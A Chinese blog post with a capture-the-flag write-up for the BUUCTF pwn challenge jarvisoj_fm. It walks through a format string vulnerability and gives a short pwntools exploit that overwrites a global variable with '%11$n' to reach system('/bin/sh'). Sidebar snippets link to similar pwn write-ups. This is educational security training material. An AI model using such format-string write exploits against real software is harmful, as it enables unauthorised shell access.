[BUUCTF]PWN——jarvisoj_fm

最新推荐文章于 2024-09-04 10:14:21 发布
最新推荐文章于 2024-09-04 10:14:21 发布
阅读量1.1k 收藏 4
点赞数 1
分类专栏: BUUCTF刷题记录 PWN 文章标签: ida分析 格式化字符串漏洞 内存修改 shell获取 exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/109406693
版权

jarvisoj_fm

附件

步骤:

  1. 例行检查,32位,开启了canary和nx保护
    在这里插入图片描述

  2. 运行一下程序,看看大概的情况 在这里插入图片描述

  3. 32位ida载入,shift+f12检索程序里的字符串,看见了 " /bin/sh " 字符串
    在这里插入图片描述

  4. 双击跟进,找到程序主体,当x=4的时候会执行system(/bin/sh)
    在这里插入图片描述
    第10行存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4
    x_addr=0x804A02C
    在这里插入图片描述

  5. 来找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11
    在这里插入图片描述
    利用x的地址配合上%11$n 将x修改为4

payload=p32(x_addr)+"%11$n"

稍微解释一下payload,首先传入x参数的地址,这个地址存放在栈上偏移为11的位置,利用%11$n,定位到了偏移为11的位置,往这个位置写入数据,写入的数据由%11$n前面的参数的长度决定,而我们的x参数的地址,正好是4位,不需要添a来补齐位数就可以直接利用,将x参数的地址的值改成了4,获取了shell

完整exp

from pwn import *

r=remote('node3.buuoj.cn',25582)
x_addr=0x804A02C

payload=p32(x_addr)+"%11$n"

r.sendline(payload)

r.interactive()

在这里插入图片描述

Angel~Yan
关注
专栏目录
BUUCTFjarvisoj_fm(write up)
qq_44768749的博客
08-24 443
BUUCTFjarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、canary以及部分RELRO保护 0x02 运行 运行未发现什么异常,但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单,关键部分都在主函数中,有getshell的函数,当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3,需要利用格式化字符串漏洞改写x的值 测试格式
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 351
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
buuctf jarvisoj_fm
carol2358的博客
05-04 221
先运行, AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x 得出是第11位,然后p32(x_addr)正好变成4位 from pwn import * r = remote('node3.buuoj.cn', 27373) x_addr = 0x0804A02C p = flat([x_addr, '%1...
buuctfjarvisoj_fm】解题
最新发布
qq_29317353的博客
09-04 261
一道格式化字符串的漏洞题来源buuctf
buuctf jarvisoj_fm
pondzhang的专栏
03-19 306
存在格式化字符串漏洞 而实际上x的值为3 需要通过格式化字符串漏洞来重写x的值 使用aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x测试格式化字符串漏洞长度 格式化字符串的漏洞的任意写地址长度为11。可以使用$n来写地址中的数据。使用%11$n,意思将0x0804A02C的x地址写入32位大小的一个...
[BUUCTF-pwn]——jarvisoj_fm
Y_peak的博客
02-22 175
[BUUCTF-pwn]—— 题目地址: https://buuoj.cn/challenges#jarvisoj_fm 点击一下writeup 在这里 以前写过所以偷懒一下, 嘿嘿嘿!!! 各位师傅不要见怪呀 ????
[PWN] BUUCTF jarvisoj_fm
空城惜梦的博客
06-05 399
[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro,canary,nx 执行程序,观察程序的逻辑,在打印出输入的字符后,会打印出3! 32IDA打开查看主要函数main,观察到在红框那里存在的很明显的格式化字符串漏洞,而且当x==4时,会得到flag,根据之前执行的程序可知,未修改x之前x的值为3,则若要修改x,需要利用格式化字符串漏洞的任意地址读写 解题思路 利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",
jarvisoj_fmBUUCTF
qq_41696518的博客
08-31 313
jarvisoj_fmBUUCTF
BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 694
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 307
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 534
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 239
BUUCTF 做题练习
BUUCTF-jarvisoj_fm1-WP
Rt1Text的博客
10-30 273
有canary ,题目提升fm,考虑格式化字符串。
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 725
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
jarvisoj_fm
m0_52231248的博客
11-15 475
jarvisoj_fm Checksec: Ida: 很明显的格式化字符串漏洞并且我们将x修改为4程序就会给我们调用system函数 偏移gdb .%p都能确定,利用方式%$n,pwntools的fmstr模块都行可以看我之前写的pwn5 的wp有详细说 Exp: Flag: ...
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值